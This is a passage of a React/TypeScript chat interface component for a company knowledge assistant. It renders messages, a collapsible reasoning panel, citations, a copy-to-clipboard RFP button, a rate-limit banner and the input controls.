    setAcknowledgmentText('');
    setThinkingText('');
    setStreamStatus(null);
    setToolActivity([]);
    setCurrentQuestion('');
  };

  // Form submit handler
  const handleSendMessage = async (e: React.FormEvent) => {
    e.preventDefault();
    if (!input.trim() || isLoading) return;

    const userMessage: Message = {
      role: 'user',
      content: input,
      timestamp: new Date().toISOString()
    };

    setMessages(prev => [...prev, userMessage]);
    const userInput = input;
    setInput('');

    // Call sendMessage with the user's input and current messages
    await sendMessage(userInput, messages);
  };

  const clearConversation = () => {
    if (window.confirm('Are you sure you want to clear the conversation?')) {
      setMessages([]);
    }
  };

  return (
    <div className="flex flex-col h-screen font-sans" style={{ backgroundColor: '#F0F7FF' }}>
      {/* Header - Only shown during conversation */}
      {messages.length > 0 && (
        // Conversation Header
        <div style={{ display: 'flex', alignItems: 'center', justifyContent: 'space-between', padding: '16px 24px', backgroundColor: '#EBF5FF', borderBottom: '1px solid rgba(0, 0, 0, 0.1)' }}>
          <div style={{ display: 'flex', alignItems: 'center', gap: '12px' }}>
            <svg
              style={{ width: '120px', height: 'auto', flexShrink: 0 }}
              viewBox="0 0 740 225"
              xmlns="http://www.w3.org/2000/svg"
              fill="#1F2937"
            >
              <g>
                <path d="M122.853,94.473c-1.474,0.168-2.934-0.316-4.083-1.272L54.01,39.249c-4.29-3.575-10.65-2.993-14.22,1.292s-2.993,10.65,1.292,14.22l64.756,53.952c5.301,4.428,12.021,6.489,18.85,5.877c6.859-0.621,13.067-3.885,17.475-9.171c4.413-5.296,6.499-11.992,5.873-18.85c-0.621-6.864-3.885-13.071-9.176-17.475L74.024,15.073C56.505,0.468,30.347,2.84,15.742,20.374C1.132,37.903,3.514,64.05,21.043,78.655l98.793,82.324c4.556,3.797,7.362,9.142,7.899,15.049c0.537,5.907-1.257,11.666-5.059,16.232c-3.792,4.556-9.137,7.357-15.049,7.899c-5.922,0.503-11.671-1.272-16.227-5.059l-68.838-57.365c-4.29-3.56-10.65-2.988-14.22,1.292c-3.57,4.29-2.993,10.66,1.292,14.23l68.838,57.365c7.692,6.4,17.179,9.822,27.07,9.822c1.302,0,2.608-0.059,3.92-0.178c11.282-1.026,21.483-6.38,28.732-15.078c7.253-8.708,10.685-19.713,9.654-30.995c-1.026-11.282-6.38-21.488-15.083-28.737L33.971,63.143c-8.974-7.48-10.192-20.867-2.717-29.841c3.624-4.349,8.723-7.026,14.358-7.539c5.67-0.488,11.139,1.203,15.483,4.822l64.835,54.026c1.149,0.957,1.854,2.298,1.992,3.787c0.133,1.489-0.316,2.939-1.272,4.083C125.689,93.635,124.342,94.345,122.853,94.473z"/>
                <path d="M233.789,122.763c-13.517-3.511-19.135-5.09-19.135-11.41c0-5.092,4.214-8.251,12.113-8.251c8.777,0,14.044,3.862,14.044,12.991h23.523c0-19.837-14.044-30.194-37.391-30.194c-22.119,0-36.865,11.41-36.865,27.385c0,20.714,15.974,24.225,30.896,28.087c13.868,3.687,20.539,5.267,20.539,12.991c0,5.267-4.389,8.601-12.99,8.601c-8.799,0-14.059-3.802-15.325-10.614c-0.355-1.911-1.786-3.428-3.73-3.428h-17.498c-2.168,0-4.018,1.875-3.809,4.032c1.819,18.829,16.679,27.741,39.836,27.741c24.225,0,39.322-11.235,39.322-27.911C267.318,131.013,249.763,126.976,233.789,122.763z"/>
                <path d="M356.611,115.565c-5.617-18.081-20.714-29.666-41.253-29.666c-27.911,0-44.237,20.362-44.237,46.694c0,28.439,16.326,48.1,44.413,48.1c21.053,0,35.595-10.668,41.041-24.496c1.005-2.552-0.71-5.347-3.453-5.347h-17.195c-1.68,0-2.985,1.174-3.595,2.739c-2.244,5.755-8.264,9.724-16.798,9.724c-10.533,0-19.486-6.495-20.188-24.927h64.074C359.42,128.556,358.542,121.71,356.611,115.565z M295.872,122.939c1.93-13.517,9.479-19.662,19.485-19.662c9.831,0,17.906,6.145,19.486,19.662H295.872z"/>
                <path d="M409.738,104.857c9.48,0,15.799,6.496,16.677,17.028h25.63c-1.931-20.889-18.081-35.986-42.131-35.986c-27.209,0-44.94,18.608-44.94,47.397s17.73,47.397,44.94,47.397c22.488,0,38.069-13.199,41.577-33.428c0.391-2.253-1.488-4.315-3.775-4.315h-18.16c-1.895,0-3.377,1.456-3.691,3.326c-1.617,9.622-7.591,15.458-16.127,15.458c-11.937,0-19.134-10.883-19.134-28.438C390.604,115.741,397.802,104.857,409.738,104.857z"/>
                <path d="M491.964,65.535h-24.576v23.171h-14.395v18.257h14.395v67.158c0,2.078,1.684,3.762,3.762,3.762h17.053c2.077,0,3.762-1.684,3.762-3.762v-67.158h17.028V88.707h-17.028V65.535z"/>
                <path d="M532.685,51.31h-5.446c-6.304,0-11.414,5.11-11.414,11.414v1.407c0,6.304,5.11,11.414,11.414,11.414h5.446c6.304,0,11.414-5.11,11.414-11.414v-1.407C544.099,56.421,538.989,51.31,532.685,51.31z"/>
                <path d="M517.674,174.122c0,2.078,1.684,3.762,3.762,3.762h17.052c2.077,0,3.762-1.684,3.762-3.762V88.707h-24.576V174.122z"/>
                <path d="M596.381,85.899c-27.911,0-45.642,18.431-45.642,47.397c0,28.965,17.73,47.397,45.642,47.397s45.642-18.433,45.642-47.397C642.023,104.33,624.293,85.899,596.381,85.899z M596.381,161.734c-12.113,0-19.836-11.06-19.836-28.438c0-17.379,7.724-28.439,19.836-28.439c12.113,0,19.836,11.06,19.836,28.439C616.218,150.674,608.494,161.734,596.381,161.734z"/>
                <path d="M700.315,86.212c-11.411,0-20.364,5.83-26.157,13.729h-0.351V88.707h-22.996v85.416c0,2.078,1.684,3.762,3.762,3.762h17.053c2.078,0,3.762-1.684,3.762-3.762v-43.987c0-16.15,7.373-24.225,17.554-24.225c9.655,0,15.623,6.143,15.623,19.661v48.551c0,2.078,1.684,3.762,3.762,3.762h17.053c2.078,0,3.762-1.684,3.762-3.762v-51.008C733.141,98.888,720.327,86.212,700.315,86.212z"/>
              </g>
            </svg>
            <div style={{
              padding: '2px 10px',
              fontSize: '12px',
              color: '#4B5563',
              backgroundColor: '#F9FAFB',
              borderRadius: '999px',
              whiteSpace: 'nowrap'
            }}>
              {AGENT_NAME}
            </div>
          </div>
          <button
            onClick={onLogout}
            style={{
              padding: '8px 16px',
              backgroundColor: '#FFFFFF',
              border: '1px solid #E5E7EB',
              borderRadius: '8px',
              fontSize: '14px',
              cursor: 'pointer',
              color: '#4B5563'
            }}
          >
            Sign out
          </button>
        </div>
      )}

      {/* Messages Area */}
      <div ref={containerRef} className="flex-1 overflow-y-auto" style={{ padding: messages.length === 0 ? '40px 20px' : '24px 20px', display: messages.length === 0 ? 'flex' : 'block', alignItems: messages.length === 0 ? 'center' : 'unset', justifyContent: messages.length === 0 ? 'center' : 'unset' }}>
        {messages.length === 0 ? (
          // Empty State - logo at top, centered layout
          <div className="flex flex-col items-center justify-center" style={{ maxWidth: '700px', margin: '0 auto', width: '100%' }}>
            {/* Logo */}
            <svg
              className="mx-auto mb-4"
              style={{ maxWidth: '140px', height: 'auto' }}
              viewBox="0 0 740 225"
              xmlns="http://www.w3.org/2000/svg"
              fill="#1F2937"
            >
              <g>
                <path d="M122.853,94.473c-1.474,0.168-2.934-0.316-4.083-1.272L54.01,39.249c-4.29-3.575-10.65-2.993-14.22,1.292s-2.993,10.65,1.292,14.22l64.756,53.952c5.301,4.428,12.021,6.489,18.85,5.877c6.859-0.621,13.067-3.885,17.475-9.171c4.413-5.296,6.499-11.992,5.873-18.85c-0.621-6.864-3.885-13.071-9.176-17.475L74.024,15.073C56.505,0.468,30.347,2.84,15.742,20.374C1.132,37.903,3.514,64.05,21.043,78.655l98.793,82.324c4.556,3.797,7.362,9.142,7.899,15.049c0.537,5.907-1.257,11.666-5.059,16.232c-3.792,4.556-9.137,7.357-15.049,7.899c-5.922,0.503-11.671-1.272-16.227-5.059l-68.838-57.365c-4.29-3.56-10.65-2.988-14.22,1.292c-3.57,4.29-2.993,10.66,1.292,14.23l68.838,57.365c7.692,6.4,17.179,9.822,27.07,9.822c1.302,0,2.608-0.059,3.92-0.178c11.282-1.026,21.483-6.38,28.732-15.078c7.253-8.708,10.685-19.713,9.654-30.995c-1.026-11.282-6.38-21.488-15.083-28.737L33.971,63.143c-8.974-7.48-10.192-20.867-2.717-29.841c3.624-4.349,8.723-7.026,14.358-7.539c5.67-0.488,11.139,1.203,15.483,4.822l64.835,54.026c1.149,0.957,1.854,2.298,1.992,3.787c0.133,1.489-0.316,2.939-1.272,4.083C125.689,93.635,124.342,94.345,122.853,94.473z"/>
                <path d="M233.789,122.763c-13.517-3.511-19.135-5.09-19.135-11.41c0-5.092,4.214-8.251,12.113-8.251c8.777,0,14.044,3.862,14.044,12.991h23.523c0-19.837-14.044-30.194-37.391-30.194c-22.119,0-36.865,11.41-36.865,27.385c0,20.714,15.974,24.225,30.896,28.087c13.868,3.687,20.539,5.267,20.539,12.991c0,5.267-4.389,8.601-12.99,8.601c-8.799,0-14.059-3.802-15.325-10.614c-0.355-1.911-1.786-3.428-3.73-3.428h-17.498c-2.168,0-4.018,1.875-3.809,4.032c1.819,18.829,16.679,27.741,39.836,27.741c24.225,0,39.322-11.235,39.322-27.911C267.318,131.013,249.763,126.976,233.789,122.763z"/>
                <path d="M356.611,115.565c-5.617-18.081-20.714-29.666-41.253-29.666c-27.911,0-44.237,20.362-44.237,46.694c0,28.439,16.326,48.1,44.413,48.1c21.053,0,35.595-10.668,41.041-24.496c1.005-2.552-0.71-5.347-3.453-5.347h-17.195c-1.68,0-2.985,1.174-3.595,2.739c-2.244,5.755-8.264,9.724-16.798,9.724c-10.533,0-19.486-6.495-20.188-24.927h64.074C359.42,128.556,358.542,121.71,356.611,115.565z M295.872,122.939c1.93-13.517,9.479-19.662,19.485-19.662c9.831,0,17.906,6.145,19.486,19.662H295.872z"/>
                <path d="M409.738,104.857c9.48,0,15.799,6.496,16.677,17.028h25.63c-1.931-20.889-18.081-35.986-42.131-35.986c-27.209,0-44.94,18.608-44.94,47.397s17.73,47.397,44.94,47.397c22.488,0,38.069-13.199,41.577-33.428c0.391-2.253-1.488-4.315-3.775-4.315h-18.16c-1.895,0-3.377,1.456-3.691,3.326c-1.617,9.622-7.591,15.458-16.127,15.458c-11.937,0-19.134-10.883-19.134-28.438C390.604,115.741,397.802,104.857,409.738,104.857z"/>
                <path d="M491.964,65.535h-24.576v23.171h-14.395v18.257h14.395v67.158c0,2.078,1.684,3.762,3.762,3.762h17.053c2.077,0,3.762-1.684,3.762-3.762v-67.158h17.028V88.707h-17.028V65.535z"/>
                <path d="M532.685,51.31h-5.446c-6.304,0-11.414,5.11-11.414,11.414v1.407c0,6.304,5.11,11.414,11.414,11.414h5.446c6.304,0,11.414-5.11,11.414-11.414v-1.407C544.099,56.421,538.989,51.31,532.685,51.31z"/>
                <path d="M517.674,174.122c0,2.078,1.684,3.762,3.762,3.762h17.052c2.077,0,3.762-1.684,3.762-3.762V88.707h-24.576V174.122z"/>
                <path d="M596.381,85.899c-27.911,0-45.642,18.431-45.642,47.397c0,28.965,17.73,47.397,45.642,47.397s45.642-18.433,45.642-47.397C642.023,104.33,624.293,85.899,596.381,85.899z M596.381,161.734c-12.113,0-19.836-11.06-19.836-28.438c0-17.379,7.724-28.439,19.836-28.439c12.113,0,19.836,11.06,19.836,28.439C616.218,150.674,608.494,161.734,596.381,161.734z"/>
                <path d="M700.315,86.212c-11.411,0-20.364,5.83-26.157,13.729h-0.351V88.707h-22.996v85.416c0,2.078,1.684,3.762,3.762,3.762h17.053c2.078,0,3.762-1.684,3.762-3.762v-43.987c0-16.15,7.373-24.225,17.554-24.225c9.655,0,15.623,6.143,15.623,19.661v48.551c0,2.078,1.684,3.762,3.762,3.762h17.053c2.078,0,3.762-1.684,3.762-3.762v-51.008C733.141,98.888,720.327,86.212,700.315,86.212z"/>
              </g>
            </svg>

            <h1 style={{ fontSize: '32px', fontWeight: 600, color: '#111', marginBottom: '8px', textAlign: 'center' }}>
              {AGENT_NAME}
            </h1>
            <p style={{ fontSize: '18px', color: '#4B5563', marginBottom: '32px', textAlign: 'center', lineHeight: '1.6' }}>
              {AGENT_PROMPT}
            </p>

            {/* Input Box - ABOVE the cards */}
            <div style={{ display: 'flex', gap: '12px', alignItems: 'center', backgroundColor: '#FFFFFF', padding: '12px', borderRadius: '12px', border: '1px solid #E5E7EB', marginBottom: '40px', boxShadow: '0 2px 8px rgba(0, 0, 0, 0.05)', width: '100%' }}>
              <textarea
                ref={inputRef}
                value={input}
                onChange={handleInputChange}
                placeholder="Ask a question..."
                disabled={isLoading}
                rows={1}
                style={{ flex: 1, border: 'none', outline: 'none', fontSize: '16px', color: '#111', backgroundColor: 'transparent', resize: 'none', maxHeight: '144px', overflowY: 'auto', minHeight: '24px', lineHeight: '1.5' }}
                onKeyPress={(e) => {
                  if (e.key === 'Enter' && !e.shiftKey) {
                    e.preventDefault();
                    handleSendMessage(e as any);
                  }
                }}
              />
              <button
                onClick={handleSendMessage}
                disabled={!input.trim() || isLoading}
                style={{ padding: '10px 20px', backgroundColor: isLoading || !input.trim() ? 'rgba(0, 102, 255, 0.4)' : '#0066FF', color: '#FFF', border: 'none', borderRadius: '8px', fontSize: '16px', fontWeight: 500, cursor: isLoading || !input.trim() ? 'not-allowed' : 'pointer' }}
              >
                Send
              </button>
            </div>

            {/* Suggested Question Cards - flexbox with centered wrapping */}
            <div className="flex flex-wrap justify-center gap-3 w-full" style={{ maxWidth: '800px', margin: '0 auto' }}>
              {["What is Section's product vision?", "Who are Section's customers?", "Who is on the leadership team?"].map((question, idx) => (
                <button
                  key={idx}
                  onClick={() => {
                    const userMessage: Message = {
                      role: 'user',
                      content: question,
                      timestamp: new Date().toISOString()
                    };
                    setMessages(prev => [...prev, userMessage]);
                    sendMessage(question, messages);
                  }}
                  style={{ padding: '20px 16px', background: '#FFFFFF', border: '1px solid #E5E7EB', borderRadius: '12px', color: '#111', fontSize: '14px', cursor: 'pointer', transition: 'all 0.2s', textAlign: 'center', boxShadow: '0 1px 3px rgba(0, 0, 0, 0.05)', lineHeight: '1.4', display: 'flex', alignItems: 'center', justifyContent: 'center', height: '120px', width: '180px', flexShrink: 0 }}
                  onMouseEnter={(e) => {
                    e.currentTarget.style.transform = 'scale(1.03)';
                    e.currentTarget.style.borderColor = '#0066FF';
                    e.currentTarget.style.boxShadow = '0 4px 12px rgba(0, 102, 255, 0.15)';
                  }}
                  onMouseLeave={(e) => {
                    e.currentTarget.style.transform = 'scale(1)';
                    e.currentTarget.style.borderColor = '#E5E7EB';
                    e.currentTarget.style.boxShadow = '0 1px 3px rgba(0, 0, 0, 0.05)';
                  }}
                >
                  {question}
                </button>
              ))}
            </div>
          </div>
        ) : (
          <>
            {/* Conversation messages with max-width */}
            <div style={{ maxWidth: '900px', margin: '0 auto', width: '100%' }}>
            {messages.map((msg, idx) => (
              <div key={idx} className={`flex mb-6 ${msg.role === 'user' ? 'justify-end' : 'justify-start'}`}>
                <div className={msg.role === 'user' ? 'max-w-[70%]' : 'max-w-[85%]'}>
                  {/* User Message Bubble */}
                  {msg.role === 'user' ? (
                    <>
                      <div style={{
                        backgroundColor: '#0066FF',
                        color: '#FFF',
                        padding: '14px 18px',
                        borderRadius: '16px',
                        borderBottomRightRadius: '4px',
                        fontSize: '16px',
                        lineHeight: '1.5',
                        boxShadow: '0 2px 8px rgba(0, 102, 255, 0.2)'
                      }}>
                        <div className="prose prose-sm prose-invert max-w-none">
                          <SafeMarkdown>{msg.content}</SafeMarkdown>
                        </div>
                      </div>
                      <div className="text-xs text-gray-400 mt-1.5 text-right">
                        {formatTimestamp(msg.timestamp)}
                      </div>
                    </>
                  ) : (
                    /* AI Message Bubbles */
                    <div className="space-y-3">
                      {/* Acknowledgment */}
                      {msg.acknowledgment && (
                        <div style={{
                          backgroundColor: '#f8fafc',
                          color: '#111',
                          padding: '16px 20px',
                          borderRadius: '16px',
                          borderBottomLeftRadius: '4px',
                          fontSize: '16px',
                          lineHeight: '1.6',
                          border: '1px solid #E5E7EB'
                        }}>
                          {msg.citations && Object.keys(msg.citations).length > 0 ? (
                            <ContentWithCitations
                              content={msg.acknowledgment}
                              citations={msg.citations}
                              messageId={`msg-${idx}-ack`}
                              expandedCitation={expandedCitation}
                              setExpandedCitation={setExpandedCitation}
                            />
                          ) : (
                            <div className="prose prose-sm max-w-none">
                              <SafeMarkdown>{msg.acknowledgment}</SafeMarkdown>
                            </div>
                          )}
                        </div>
                      )}

                      {/* Thinking/Reasoning - Collapsed by default */}
                      {msg.thinking && (
                        <div style={{
                          backgroundColor: '#FFFBEB',
                          border: '1px solid #FDE68A',
                          borderRadius: '8px',
                          overflow: 'hidden'
                        }}>
                          <button
                            onClick={() => setExpandedReasoning(prev => ({
                              ...prev,
                              [idx]: !prev[idx]
                            }))}
                            style={{
                              width: '100%',
                              display: 'flex',
                              alignItems: 'center',
                              justifyContent: 'space-between',
                              padding: '12px 16px',
                              backgroundColor: 'transparent',
                              border: 'none',
                              cursor: 'pointer',
                              transition: 'background-color 0.2s'
                            }}
                            onMouseEnter={(e) => {
                              e.currentTarget.style.backgroundColor = '#FEF3C7';
                            }}
                            onMouseLeave={(e) => {
                              e.currentTarget.style.backgroundColor = 'transparent';
                            }}
                          >
                            <div style={{ display: 'flex', alignItems: 'center', gap: '8px' }}>
                              <svg style={{ width: '16px', height: '16px', color: '#D97706' }} fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M9.663 17h4.673M12 3v1m6.364 1.636l-.707.707M21 12h-1M4 12H3m3.343-5.657l-.707-.707m2.828 9.9a5 5 0 117.072 0l-.548.547A3.374 3.374 0 0014 18.469V19a2 2 0 11-4 0v-.531c0-.895-.356-1.754-.988-2.386l-.548-.547z" />
                              </svg>
                              <span style={{ fontSize: '14px', fontWeight: 500, color: '#B45309' }}>
                                {expandedReasoning[idx] ? 'Hide' : 'Show'} Reasoning
                              </span>
                            </div>
                            <svg
                              style={{
                                width: '16px',
                                height: '16px',
                                color: '#D97706',
                                transform: expandedReasoning[idx] ? 'rotate(180deg)' : 'rotate(0deg)',
                                transition: 'transform 0.2s'
                              }}
                              fill="none"
                              stroke="currentColor"
                              viewBox="0 0 24 24"
                            >
                              <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                            </svg>
                          </button>

                          {expandedReasoning[idx] && (
                            <div style={{ padding: '0 24px 16px 24px' }}>
                              <div style={{ fontSize: '16px', color: '#374151', lineHeight: '1.6' }} className="prose prose-sm max-w-none">
                                <SafeMarkdown>{msg.thinking}</SafeMarkdown>
                              </div>
                            </div>
                          )}
                        </div>
                      )}

                      {/* Main Answer */}
                      <div style={{
                        backgroundColor: '#f8fafc',
                        color: '#111',
                        padding: '18px 22px',
                        borderRadius: '16px',
                        borderBottomLeftRadius: '4px',
                        fontSize: '16px',
                        lineHeight: '1.6',
                        border: '1px solid #E5E7EB'
                      }}>
                        {msg.citations && Object.keys(msg.citations).length > 0 ? (
                          <ContentWithCitations
                            content={msg.content}
                            citations={msg.citations}
                            messageId={`msg-${idx}`}
                            expandedCitation={expandedCitation}
                            setExpandedCitation={setExpandedCitation}
                          />
                        ) : (
                          <div className="prose prose-sm max-w-none">
                            <SafeMarkdown>{msg.content}</SafeMarkdown>
                          </div>
                        )}
                      </div>

                      {/* Copy RFP Insert button */}
                      {(() => {
                        const rfpText = extractRfpInsertText(msg.content);
                        if (!rfpText) return null;
                        const isCopied = copiedMessageIdx === idx;
                        return (
                          <div style={{ marginTop: '8px', display: 'flex', alignItems: 'center' }}>
                            <button
                              onClick={() => {
                                navigator.clipboard.writeText(rfpText).then(() => {
                                  if (copiedTimeoutRef.current) clearTimeout(copiedTimeoutRef.current);
                                  setCopiedMessageIdx(idx);
                                  copiedTimeoutRef.current = setTimeout(() => setCopiedMessageIdx(null), 2000);
                                }).catch(() => {
                                  console.error('Failed to copy to clipboard');
                                });
                              }}
                              style={{
                                display: 'inline-flex',
                                alignItems: 'center',
                                gap: '6px',
                                padding: '6px 12px',
                                backgroundColor: isCopied ? '#ECFDF5' : '#F9FAFB',
                                border: `1px solid ${isCopied ? '#6EE7B7' : '#E5E7EB'}`,
                                borderRadius: '6px',
                                fontSize: '13px',
                                color: isCopied ? '#059669' : '#6B7280',
                                cursor: 'pointer',
                                transition: 'all 0.2s'
                              }}
                              onMouseEnter={(e) => {
                                if (!isCopied) {
                                  e.currentTarget.style.backgroundColor = '#F3F4F6';
                                  e.currentTarget.style.borderColor = '#D1D5DB';
                                }
                              }}
                              onMouseLeave={(e) => {
                                if (!isCopied) {
                                  e.currentTarget.style.backgroundColor = '#F9FAFB';
                                  e.currentTarget.style.borderColor = '#E5E7EB';
                                }
                              }}
                            >
                              {isCopied ? (
                                <>
                                  <svg style={{ width: '14px', height: '14px' }} fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M5 13l4 4L19 7" />
                                  </svg>
                                  Copied
                                </>
                              ) : (
                                <>
                                  <svg style={{ width: '14px', height: '14px' }} fill="none" stroke="currentColor" viewBox="0 0 24 24">
                                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M8 16H6a2 2 0 01-2-2V6a2 2 0 012-2h8a2 2 0 012 2v2m-6 12h8a2 2 0 002-2v-8a2 2 0 00-2-2h-8a2 2 0 00-2 2v8a2 2 0 002 2z" />
                                  </svg>
                                  Copy RFP Insert
                                </>
                              )}
                            </button>
                          </div>
                        );
                      })()}

                      <div className="text-xs text-gray-400 mt-1.5 ml-1.5">
                        {formatTimestamp(msg.timestamp)}
                      </div>
                    </div>
                  )}
                </div>
              </div>
            ))}

            {(acknowledgmentText || thinkingText || streamingMessage || isLoading) && (
              <div className="flex justify-start mb-6">
                <div className="max-w-[85%] space-y-3">

                  {/* Acknowledgment Section */}
                  {acknowledgmentText && (
                    <div style={{
                      backgroundColor: '#f8fafc',
                      color: '#111',
                      padding: '16px 20px',
                      borderRadius: '16px',
                      borderBottomLeftRadius: '4px',
                      fontSize: '16px',
                      lineHeight: '1.6',
                      border: '1px solid #E5E7EB',
                      marginTop: '12px'
                    }}>
                      <div className="prose prose-sm max-w-none">
                        <SafeMarkdown>{acknowledgmentText}</SafeMarkdown>
                      </div>
                    </div>
                  )}

                  {/* Thinking/Reasoning Section - Collapsed by default */}
                  {thinkingText && (
                    <div style={{
                      backgroundColor: '#FFFBEB',
                      border: '1px solid #FDE68A',
                      borderRadius: '8px',
                      overflow: 'hidden',
                      marginTop: '12px'
                    }}>
                      <button
                        onClick={() => setShowStreamingReasoning(!showStreamingReasoning)}
                        style={{
                          width: '100%',
                          display: 'flex',
                          alignItems: 'center',
                          justifyContent: 'space-between',
                          padding: '12px 16px',
                          backgroundColor: 'transparent',
                          border: 'none',
                          cursor: 'pointer',
                          transition: 'background-color 0.2s'
                        }}
                        onMouseEnter={(e) => {
                          e.currentTarget.style.backgroundColor = '#FEF3C7';
                        }}
                        onMouseLeave={(e) => {
                          e.currentTarget.style.backgroundColor = 'transparent';
                        }}
                      >
                        <div style={{ display: 'flex', alignItems: 'center', gap: '8px' }}>
                          <svg style={{ width: '16px', height: '16px', color: '#D97706' }} fill="none" stroke="currentColor" viewBox="0 0 24 24">
                            <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M9.663 17h4.673M12 3v1m6.364 1.636l-.707.707M21 12h-1M4 12H3m3.343-5.657l-.707-.707m2.828 9.9a5 5 0 117.072 0l-.548.547A3.374 3.374 0 0014 18.469V19a2 2 0 11-4 0v-.531c0-.895-.356-1.754-.988-2.386l-.548-.547z" />
                          </svg>
                          <span style={{ fontSize: '14px', fontWeight: 500, color: '#B45309' }}>
                            {showStreamingReasoning ? 'Hide' : 'Show'} Reasoning
                          </span>
                        </div>
                        <svg
                          style={{
                            width: '16px',
                            height: '16px',
                            color: '#D97706',
                            transform: showStreamingReasoning ? 'rotate(180deg)' : 'rotate(0deg)',
                            transition: 'transform 0.2s'
                          }}
                          fill="none"
                          stroke="currentColor"
                          viewBox="0 0 24 24"
                        >
                          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M19 9l-7 7-7-7" />
                        </svg>
                      </button>

                      {showStreamingReasoning && (
                        <div style={{ padding: '0 24px 16px 24px' }}>
                          <div style={{ fontSize: '16px', color: '#374151', lineHeight: '1.6' }} className="prose prose-sm max-w-none">
                            <SafeMarkdown>{thinkingText}</SafeMarkdown>
                          </div>
                        </div>
                      )}
                    </div>
                  )}

                  {/* Answer Section - Single location for all loading and content states */}
                  <div style={{
                    backgroundColor: '#f8fafc',
                    color: '#111',
                    padding: '18px 22px',
                    borderRadius: '16px',
                    borderBottomLeftRadius: '4px',
                    fontSize: '16px',
                    lineHeight: '1.6',
                    border: '1px solid #E5E7EB',
                    marginTop: '12px'
                  }}>
                    {streamingMessage ? (
                      <div className="prose prose-sm max-w-none">
                        <SafeMarkdown>{streamingMessage}</SafeMarkdown>
                      </div>
                    ) : (isLoading || (messages.length > 0 && messages[messages.length - 1]?.role === 'user')) ? (
                      <div className="flex items-center gap-3">
                        <div style={{
                          width: '16px',
                          height: '16px',
                          border: '2px solid #E5E7EB',
                          borderTopColor: '#0066FF',
                          borderRadius: '50%',
                          animation: 'spin 0.8s linear infinite',
                          flexShrink: 0
                        }} />
                        <div style={{ flex: 1, fontSize: '16px', color: '#111' }}>
                          {getDisplayMessage(streamStatus?.message, loadingElapsedTime)}
                        </div>
                      </div>
                    ) : null}
                  </div>
                </div>
              </div>
            )}

            </div>
            {/* End of max-width wrapper */}
            </>
          )}
        <div ref={messagesEndRef} />
      </div>

      {/* Input Area - Only show during conversation, not on empty state */}
      {messages.length > 0 && (
      <div style={{
        padding: '20px',
        backgroundColor: '#EBF5FF',
        borderTop: '1px solid rgba(0, 0, 0, 0.1)'
      }}>
        {/* Rate Limit Countdown Banner */}
        {isWaitingForRetry && retryCountdown > 0 && (
          <div className="max-w-4xl mx-auto mb-4 bg-blue-50 border border-blue-200 rounded-lg px-4 py-3">
            <div className="flex items-center space-x-3">
              <div className="flex-shrink-0">
                <svg className="w-5 h-5 text-blue-600 animate-pulse" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                  <path strokeLinecap="round" strokeLinejoin="round" strokeWidth={2} d="M12 8v4l3 3m6-3a9 9 0 11-18 0 9 9 0 0118 0z" />
                </svg>
              </div>
              <div className="flex-1">
                <p className="text-sm font-medium text-blue-900">
                  Auto-retry in {retryCountdown} second{retryCountdown !== 1 ? 's' : ''}
                </p>
                <p className="text-xs text-blue-700">
                  Your message is queued. Rate limit will reset soon...
                </p>
              </div>
              <div className="flex-shrink-0">
                <div className="text-2xl font-bold text-blue-600">{retryCountdown}</div>
              </div>
            </div>
          </div>
        )}

        <div style={{ maxWidth: '800px', margin: '0 auto' }}>
          <div style={{
            display: 'flex',
            gap: '12px',
            alignItems: 'center',
            backgroundColor: '#FFFFFF',
            padding: '12px',
            borderRadius: '12px',
            border: '1px solid #E5E7EB'
          }}>
            <textarea
              ref={inputRef}
              value={input}
              onChange={handleInputChange}
              placeholder={isLoading || isWaitingForRetry
                ? "Generating response..."
                : "Ask a follow-up question..."}
              disabled={isLoading || isWaitingForRetry}
              autoFocus
              rows={1}
              style={{
                flex: 1,
                border: 'none',
                outline: 'none',
                fontSize: '16px',
                color: (isLoading || isWaitingForRetry) ? '#9CA3AF' : '#111',
                backgroundColor: 'transparent',
                resize: 'none',
                minHeight: '24px',
                maxHeight: '144px',
                overflowY: 'auto',
                lineHeight: '1.5',
                cursor: (isLoading || isWaitingForRetry) ? 'not-allowed' : 'text'
              }}
              onKeyPress={(e) => {
                if (e.key === 'Enter' && !e.shiftKey) {
                  e.preventDefault();
                  handleSendMessage(e as any);
                }
              }}
            />
            <button
              onClick={isLoading ? handleCancelRequest : handleSendMessage}
              disabled={!isLoading && (!input.trim() || isWaitingForRetry)}
              style={{
                padding: '10px 20px',
                backgroundColor: isLoading
                  ? '#FEE2E2'
                  : (!input.trim() || isWaitingForRetry)
                    ? 'rgba(0, 102, 255, 0.4)'
                    : '#0066FF',
                color: isLoading
                  ? '#DC2626'
                  : '#FFF',
                border: isLoading ? '1px solid #FCA5A5' : 'none',
                borderRadius: '8px',
                fontSize: '16px',
                fontWeight: 500,
                cursor: (isLoading || input.trim()) ? 'pointer' : 'not-allowed',
                display: 'flex',
                alignItems: 'center',
                gap: '8px',
                transition: 'all 0.2s',
                flexShrink: 0
              }}
              onMouseEnter={(e) => {
                if (isLoading) {
                  e.currentTarget.style.backgroundColor = '#FEF2F2';
                  e.currentTarget.style.borderColor = '#EF4444';
                }
              }}
              onMouseLeave={(e) => {
                if (isLoading) {
                  e.currentTarget.style.backgroundColor = '#FEE2E2';
                  e.currentTarget.style.borderColor = '#FCA5A5';
                }
              }}
            >
              {isLoading ? (
                <>
                  <svg
                    style={{ width: '18px', height: '18px' }}
                    fill="none"
                    stroke="currentColor"
                    viewBox="0 0 24 24"
                  >
                    <rect
                      x="6"
                      y="6"
                      width="12"
                      height="12"
                      strokeWidth="2"
                      strokeLinecap="round"
                      strokeLinejoin="round"
                    />
                  </svg>
                  Stop
                </>
              ) : (
                'Send'
              )}
            </button>
          </div>
        </div>
      </div>
      )}
    </div>
  );
};

export default ChatInterface;
